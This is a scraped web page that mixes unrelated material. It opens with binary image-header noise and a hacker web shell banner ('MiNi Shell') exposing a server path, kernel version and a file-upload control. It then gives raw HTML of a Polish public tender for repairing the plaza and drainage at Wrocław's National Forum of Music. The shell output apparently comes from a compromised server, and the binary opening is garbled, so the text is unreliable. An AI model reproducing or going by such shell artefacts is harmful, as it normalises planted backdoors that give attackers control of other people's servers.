JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220609/0020138301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> 83570 Remont nawierzchni placu oraz instalacji odwodnienia przed budynkiem Narodowego Forum Muzyki we Wrocławiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wrocław, w imieniu i na rzecz której działają Wrocławskie Inwestycje Sp. z o. o. z siedzibą przy ul. Ofiar Oświęcimskich 36, 50-059 Wrocław na podstawie pełnomocnictwa Prezydenta Wrocławia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020568529</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ofiar Oświęcimskich 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-059</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wi.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.wi.wroc.pl/html/przetargi.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">jednostka organizacyjna Zarząd Dróg i Utrzymania Miasta we Wrocławiu reprezentowaną przez Wrocławskie Inwestycje Sp. z o.o.,</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">8971383551</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 49</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">53-633</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wi.wroc.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.wi.wroc.pl/html/przetargi.html</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">zgodnie z porozumieniem z dnia 14.03.2022</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> 83570 Remont nawierzchni placu oraz instalacji odwodnienia przed budynkiem Narodowego Forum Muzyki we Wrocławiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63e8c67d-e7bc-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00201383</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00031360/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Parking Podziemny Narodowego Forum Muzyki - naprawa nawierzchni i systemu odwodnienia na placu Wolności</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.wi.wroc.pl/html/przetargi.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.wi.wroc.pl/html/przetargi.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>Złożenia, zmiany lub wycofania oferty lub wniosku.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w ”Instrukcji Użytkownika systemu” dotyczącej systemu mini portal<br/>(link:https://www.uzp.gov.pl/__data/assets/pdf_file/0030/37596/Instrukcja-Uzytkownika SystemuminiPortal<br/>ePUAP.pdf) oraz Regulaminie ePUAP (link: https://pz.gov.pl/pz/regulations) .<br/>3. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>skutecznego przekazania ePUAP.<br/>4. Identyfikator postępowania i klucz publiczny dla danego postępowania o udzielenie zamówienia<br/>dostępne są na Liście wszystkich postępowań na miniPortalu. Adres internetowy pod którym dostępny<br/>jest identyfikator postępowania i klucz publiczny Zamawiający udostępnia na stronie internetowej<br/>http://www.wi.wroc.pl.<br/>Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Formularza dostępnego na<br/>ePUAP, (Dane odbiorcy: WROCŁAWSKIE INWESTYCJE SPÓŁKA Z OGRANICZONĄ<br/>ODPOWIEDZIALNOŚCIĄ, Adres skrzynki ePUAP: \WIWroclaw\skrytkaESP) uprzednio zaszyfrowaną<br/>za pomocą klucza publicznego dostępnego na miniPortal. Wykonawca, pod rygorem<br/>nieważności, składa ofertę, za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lubwniosku dostępnego na ePUAP i<br/>udostępnionego na miniPortalu (poprzez miniPortal Wykonawca<br/>wybiera ikonę Formularz do komunikacji, gdzie zostaje przekierowany na ePuap). Klucz publiczny<br/>niezbędny do zaszyfrowania oferty przez Wykonawcę jest dostępny dla wykonawców na miniPortalu. Oferta powinna być<br/>sporządzona w języku polskim, z zachowaniem formy elektronicznej (podpisanej<br/>kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym w formacie danych .pdf, .doc, .docx, .rtf, .xps, .odt. Sposób złożenia oferty, w<br/>tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika systemu” dotyczącej miniPortal. Ofertę należy złożyć w oryginale.5. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia<br/>1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w osobnym (wydzielonym) pliku wraz z jednoczesnym<br/>zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami<br/>stanowiącymi jawną część skompresowane do jednego pliku archiwum (ZIP). Wykonawca składa<br/>ofertę, zmienia ją lub wycofuje za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego na miniPortalu (poprzez miniPortal Wykonawca<br/>wybiera ikonę Formularz do komunikacji, gdzie zostaje przekierowany na ePuap). Pozostała<br/>korespondencja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie zapytań,<br/>uzupełnień w postaci oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (za<br/>wyjątkiem złożenia, zmiany lub wycofania oferty) odbywa się elektronicznie za pośrednictwem skrzynki<br/>e-mailowej: przetargi@wi.wroc.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP). Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu w sprawie podmiotowych środków dowodowych oraz rozporządzeniu w sprawie sposobu sporządzenia i przekazywania informacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ze względu na ograniczoną liczbę znaków w niniejszej<br/>sekcji ogłoszenia szczegółowe informacje dotyczące RODO znajdują się w Instrukcji dla Wykonawców.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ze względu na ograniczoną liczbę znaków w niniejszej<br/>sekcji ogłoszenia szczegółowe informacje dotyczące RODO znajdują się w Instrukcji dla Wykonawców.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/30/TP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Remont nawierzchni placu oraz instalacji odwodnienia przed budynkiem Narodowego Forum<br/>Muzyki we Wrocławiu, w ramach którego Wykonawca zobowiązany jest między innymi do:<br/>4.1.1. opracowania dokumentacji projektowej oraz specyfikacji technicznych wykonania i odbioru robót zgodnie z<br/>Programem Funkcjonalno- Użytkowym (PFU) w tym zgodnie z załączonym do PFU Raportem z badań i analiz przyczyn<br/>uszkodzeń dla nawierzchni placu przed budynkiem Narodowego Forum Muzyki we Wrocławiu wraz ze wszystkimi<br/>niezbędnymi opiniami, uzgodnieniami, zatwierdzeniami i pozwoleniami, <br/>4.1.2. realizacji robót budowlanych zgodnie z Programem Funkcjonalno-Użytkowym, na podstawie opracowanej przez<br/>Wykonawcę dokumentacji projektowej oraz dokonanego przez Wykonawcę zgłoszenia robót,<br/>-pełnienia nadzoru autorskiego podczas realizacji robót budowlanych w oparciu o wykonaną dokumentację projektową.<br/>4.2. Całość prac stanowiących przedmiot zamówienia Wykonawca zobowiązuje się wykonać zgodnie z postanowieniami<br/>umownymi, PFU i pozostałymi dokumentami składającymi się na Specyfikację Warunków Zamówienia w postępowaniu o<br/>udzielenia zamówienia publicznego dla ww. zadania, a także zgodnie <br/>z dokumentacją techniczną, obowiązującymi przepisami, normami i warunkami technicznymi wykonania i odbioru robót, ze<br/>wskazówkami Zamawiającego, zasadami wiedzy technicznej i sztuką budowlaną. Szczegółowy opis przedmiotu zamówienia został przedstawiony w Części III Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp stosowanym na podstawie art. 305 pkt 1)<br/>ustawy Pzp, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy lub dotychczasowym<br/>wykonawcom robót budowlanych, polegających na powtórzeniu podobnych robót budowlanych jak w zamówieniu podstawowym i<br/>zgodnych z jego przedmiotem, a całkowita wartość tych zamówień została uwzględniona przy obliczaniu jego wartości.<br/>Zakres prac objętych zamówieniem podobnym znajduje się Części II SWZ – PFU.<br/>Zamówienia, o których mowa powyżej zostaną udzielone na warunkach analogicznych z tymi wynikającymi ze wzoru umowy dla<br/>zamówienia podstawowego, z zastrzeżeniem zmian ściśle związanych ze specyfiką danego zamówienia oraz wynikających ze<br/>zmian przepisów prawa oraz norm technicznych, czy też zmian czynników cenotwórczych, które miały miejsce pomiędzy dniem<br/>zawarcia umowy w sprawie zamówienia podstawowego a dniem zawarcia umowy w sprawie zamówienia podobnego. Wykonawca,<br/>przed zawarciem umowy zobowiązany będzie złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o<br/>niepodleganiu wykluczeniu z postępowania, a na żądanie Zamawiającego, również dokumenty potwierdzające złożone<br/>oświadczenia, w zakresie nie szerszym niż w postępowaniu o udzielenie zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika budowy (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika robót w specjalności instalacyjnej (I)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu<br/>dotyczące zdolności technicznej lub zawodowej tj. muszą: <br/>1.1. posiadać niezbędną wiedze i doświadczenie. Warunek ten uważa się za spełniony jeżeli:<br/>1.1.1. Wykonawca wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na wykonaniu<br/>dylatacji wypełnionej materiałem trwale elastycznym o długości co najmniej 20m w nawierzchniach drogowych lub<br/>konstrukcjach obiektów kubaturowych oraz <br/>1.1.2. Wykonawca wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na budowie,<br/>przebudowie lub remoncie odwodnienia liniowego o długości co najmniej 20m na obiektach kubaturowych wraz z co<br/>najmniej trzema szczelnymi przejściami rur spustowych przez strop oraz <br/>1.1.3. Wykonawca wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną budowę lub przebudowę instalacji wodno-<br/>kanalizacyjnej podwieszonej pod strop o długości co najmniej 200 m o średnicy min. 150 mm.<br/>UWAGA! W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia,<br/>oceniany będzie ich łączny potencjał techniczny i zawodowy. W myśl postanowieniom art. 117 ust. 3 ustawy Pzp.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach poszczególnych członków<br/>konsorcjum, którzy wykonają roboty budowlane/ usługi do realizacji, których te zdolności są wymagane. Zgodnie z art. 117<br/>ust. 4 ustawy Pzp. wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane/usługi wykonają poszczególni członkowie konsorcjum – wzór w Załączniku 5. Oświadczenie<br/>dotyczące zakresu deklarowanych prac jakie będą wykonywać poszczególni wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia winno być zgodne z warunkiem udziału w postępowaniu jakim wykazywał się dany członek<br/>konsorcjum. <br/>2. Zamawiający wyjaśnia, że:<br/>a) osoby posiadające uprawnienia budowlane wydane na terenie UE mogą uzyskać decyzję w sprawie uznania kwalifikacji<br/>zawodowych oraz wpis do stosownej izby na zasadach określonych w Ustawie o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej oraz w Regulaminie postępowania w sprawie<br/>uznawania kwalifikacji do wykonywania samodzielnych funkcji technicznych w budownictwie obywateli państw<br/>członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o<br/>Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli w tych państwach,<br/>kwalifikacje odpowiadające uprawnieniom budowlanym w Polsce. (uchwalony mocą uchwały Krajowej Rady Polskiej Izby<br/>Inżynierów Budownictwa Uchwała nr 7/R/16 Krajowej Rady Polskiej Izby Inżynierów Budownictwa z dnia 18 maja 2016 r.)<br/>W razie uzyskania uznania kwalifikacji w zakresie wymaganym zgodnie z postanowieniami niniejszego punktu oraz wpisu do<br/>Izby Inżynierów Budownictwa uznaje się, że Wykonawca wykazał spełnienie warunków określonych w tym zakresie, <br/>b) pojęcia: „budowa”, „przebudowa”, „remont” o którym mowa powyżej jest rozumiane zgodnie z definicją zawartą w art. 3<br/>pkt. 6, 7a, 8 ustawy Prawo budowlane <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający zgodnie z art. 274 ust. 1 ustawy pzp przed udzieleniem zamówienia wzywa Wykonawcę lub wykonawców wspólnie ubiegających się o<br/>udzielenia zamówienia, których oferta została najwyżej oceniona 